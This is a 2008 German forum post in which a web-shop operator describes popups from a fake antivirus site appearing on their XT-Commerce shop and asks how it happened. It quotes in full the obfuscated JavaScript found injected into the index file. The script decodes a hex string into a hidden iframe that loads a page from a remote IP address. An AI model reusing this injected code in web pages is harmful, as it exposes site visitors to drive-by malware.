sports-point24 Posted June 13, 2008 Report Share Posted June 13, 2008 Hallo, wir sind gerade im Aufbau von einem XT-Commerce Shop, mussten aber heute feststellen, dass sich beim Laden der Seite Inhalte der Webseite ADVANCEDXPDEFENDER eingeschlichen hat. In der Statusleiste des Browsers kann man sehen, wie die Daten von deren Webseite geladen wird. Das Ende vom Lied, ist das immer ein nerviges Popup auf dem rechner erscheint. Wiiieeeeeee kann das dazu gekommen sein, wir haben weder irgendetwas neu eingebunden noch sonst etwas geändert. Habt Ihr Ideen? *************NACHTRAG:************* Da wir bei einem anderen XT-Commerce Shop nicht dieses Problem hatten, dieser acuh etwas später aufgesetzt wurde, haben wir folgenden Test gemacht: Alle Dateien aus dem Hauptverzeichnis von XT-Commerce (ohne Unterordner) vom neueren Shop auf den alten, problembehafteten gesetzt. Bisher zeigt sich dieser Fehler nicht mehr. Also liegt die Vermutung Nahe, dass irgendeiner dieser Dateien ne Sicherheitslücke hatte, die AdvancedXPDefender ausgenutzt hat. Hoffen wir das Beste und möge der Mist wegbleiben! *************NACHTRAG 2:************* Die Problematik ist wieder da: Der setzt in die INDEX Datei immer ans Ende des Quelltextes folgende Javascriptanweisung: <script> <!-- var d=document,kol=561; function O10H48525EBBE7165(H48525EBBE7944){ function H48525EBBE7D41() {var H48525EBBE813C=16;return H48525EBBE813C;} return( parseInt(H48525EBBE7944,H48525EBBE7D41()));}function H48525EBBE853A(H48525EBBE8935){ var H48525EBBE8D31='';for(H48525EBBE913C=0; H48525EBBE913C<H48525EBBE8935.length; H48525EBBE913C+=2){ H48525EBBE8D31 += ( String.fromCharCode (O10H48525EBBE7165(H48525EBBE8935.substr(H48525EBBE913C, 2))));}return H48525EBBE8D31;} document.write(H48525EBBE853A('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323037393330292B27376231635C272077696474683D343738206865696768743D343335207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //--> </script> Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.